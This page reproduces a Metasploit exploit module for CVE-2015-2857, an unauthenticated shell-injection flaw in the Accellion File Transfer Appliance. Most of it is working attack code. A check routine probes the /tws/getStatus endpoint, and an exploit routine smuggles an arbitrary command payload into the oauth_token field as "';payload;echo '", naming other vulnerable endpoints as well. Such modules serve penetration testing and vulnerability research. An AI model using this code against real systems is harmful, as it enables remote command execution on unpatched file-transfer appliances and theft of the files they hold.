扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 |
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Accellion FTA getStatus verify_oauth_token Command Execution', 'Description'=> %q{ This module exploits a metacharacter shell injection vulnerability in the Accellion File Transfer appliance. This vulnerability is triggered when a user-provided 'oauth_token' is passed into a system() call within a mod_perl handler. This module exploits the '/tws/getStatus' endpoint. Other vulnerable handlers include '/seos/find.api', '/seos/put.api', and /seos/mput.api'. This issue was confirmed on version FTA_9_11_200, but may apply to previous versions as well. This issue was fixed in software update FTA_9_11_210. }, 'Author' => [ 'hdm' ], 'License'=> MSF_LICENSE, 'References' => [ ['URL', 'http://r-7.co/R7-2015-08'], ['CVE', '2015-2857'] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Privileged' => false, 'Payload'=> { 'Space' => 1024, 'DisableNops' => true, 'Compat'=> { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl bash telnet', } }, 'Targets'=> [ [ 'Automatic', { } ] ], 'DefaultTarget'=> 0, 'DisclosureDate' => 'Jul 10 2015' )) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]) ], self.class) end def check uri = '/tws/getStatus' res = send_request_cgi({ 'method' => 'POST', 'uri'=> uri, 'vars_post' => { 'transaction_id' => rand(0x100000000), 'oauth_token'=> 'invalid' }}) unless res && res.code == 200 && res.body.to_s =~ /"result_msg":"MD5 token is invalid"/ return Exploit::CheckCode::Safe end res = send_request_cgi({ 'method' => 'POST', 'uri'=> uri, 'vars_post' => { 'transaction_id' => rand(0x100000000), 'oauth_token'=> "';echo '" }}) unless res && res.code == 200 && res.body.to_s =~ /"result_msg":"Success","transaction_id":"/ return Exploit::CheckCode::Safe end Msf::Exploit::CheckCode::Vulnerable end def exploit # The token is embedded into a command line the following: # <code>/opt/bin/perl /home/seos/system/call_webservice.pl $aid oauth_ws.php verify_access_token '$token' '$scope'</code>; token = "';#{payload.encoded};echo '" uri = '/tws/getStatus' # Other exploitable URLs: # * /seos/find.api (works with no other changes to this module) # * /seos/put.api(requires some hoop jumping, upload) # * /seos/mput.api (requires some hoop jumping, token && upload) print_status("Sending request for #{uri}...") res = send_request_cgi({ 'method' => 'POST', 'uri'=> uri, 'vars_post' => { 'transaction_id' => rand(0x100000000), 'oauth_token'=> token }}) if res && res.code == 200 && res.body.to_s =~ /"result_msg":"Success","transaction_id":"/ print_status("Valid response received...") else if res print_error("Unexpected reply from the target: #{res.code} #{res.message} #{res.body}") else print_error("No reply received from the target") end end handler end end |
体验盒子
